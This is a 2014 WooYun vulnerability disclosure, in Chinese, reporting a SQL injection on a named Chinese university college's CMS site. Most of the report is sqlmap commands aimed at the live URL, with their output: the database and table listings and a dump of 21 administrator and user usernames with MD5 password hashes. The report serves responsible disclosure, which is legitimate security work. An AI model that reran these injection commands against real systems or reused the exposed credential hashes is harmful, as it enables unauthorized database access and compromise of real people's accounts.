乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-10: 细节已通知厂商并且等待厂商处理中 2014-05-15: 厂商已经确认,细节仅向厂商公开 2014-05-25: 细节向核心白帽子及相关领域专家公开 2014-06-04: 细节向普通白帽子公开 2014-06-14: 细节向实习白帽子公开 2014-06-24: 细节向公众公开
中北大学信息商务学院&MySQL注入导致数据库大量重要信息泄露
注入地址:
http://xxsw.nuc.edu.cn/cms/subnews.php?id=869
SQLMAP- -.获取一个数据库:
./sqlmap.py -u "http://xxsw.nuc.edu.cn/cms/subnews.php?id=869" --dbs
available databases [2]: [*] information_schema[*] xxsw
获取数据库中的表:
./sqlmap.py -u "http://xxsw.nuc.edu.cn/cms/subnews.php?id=869" -D xxsw --tables
Database: xxsw [31 tables]+---------------------+| cms_article || cms_column || cms_config || cms_mailbox || cms_page || cms_site || cms_template || cms_user || sx_column || sx_config || sx_file || sx_gb || sx_group || sx_jb || sx_link || sx_news || sx_page || sx_pagination || sx_user || xsoa_doc_check || xsoa_doc_number || xsoa_doc_sign || xsoa_documents || xsoa_meeting_topics || xsoa_meeting_types || xsoa_meetings || xsoa_news || xsoa_notes || xsoa_user || xsoa_user_dept || xsoa_user_group |+---------------------+
获取字段:
./sqlmap.py -u "http://xxsw.nuc.edu.cn/cms/subnews.php?id=869" -D xxsw -T cms_user --columns
[7 columns]+-------------+----------+| Column | Type |+-------------+----------+| area | tinytext || create_time | datetime || id | int(11) || password | tinytext || realname | tinytext || update_time | datetime || username | tinytext |+-------------+----------+
获取字段内容:
./sqlmap.py -u "http://xxsw.nuc.edu.cn/cms/subnews.php?id=869" -D xxsw -T cms_user -C username,password --dump
[21 entries]+-----------+----------------------------------+| username | password |+-----------+----------------------------------+| cms_admin | 43dafd0f94ab583e68d91c3cf85bcf37 || syf | ed2f148555cec43254489734ff8d372f || yyw | ed2f148555cec43254489734ff8d372f || spr | c56d0e9a7ccec67b4ea131655038d604 || srg | ed2f148555cec43254489734ff8d372f || hxd | ed2f148555cec43254489734ff8d372f || wxj | ed2f148555cec43254489734ff8d372f || lcy | 37d1e3f193b1fb3b4b8c54af0f2e1adb || sy | 6a66a3ca80615d48863919264ce928c8 || lxd | ed2f148555cec43254489734ff8d372f || hxy | ed2f148555cec43254489734ff8d372f || zyh | 2c845b5c3eed5115130e20f7f229c22a || wxl | ed2f148555cec43254489734ff8d372f || lxy | 32d4904a363e98061c5b423f880eedf0 || wf | ed2f148555cec43254489734ff8d372f || awg | ed2f148555cec43254489734ff8d372f || wjl | 0de90a57104c29d3c64ed0a97a55c6c4 || ch | ed2f148555cec43254489734ff8d372f || lnn | e1835ae1497cad4198e6f8a876bb0c64 || lyq | ed2f148555cec43254489734ff8d372f || xzc | ed2f148555cec43254489734ff8d372f |+-----------+----------------------------------+
OVER!还有很多,就不展示了- -.
:)
危害等级:中
漏洞Rank:6
确认时间:2014-05-15 15:46
正在通知相关学校处理
暂无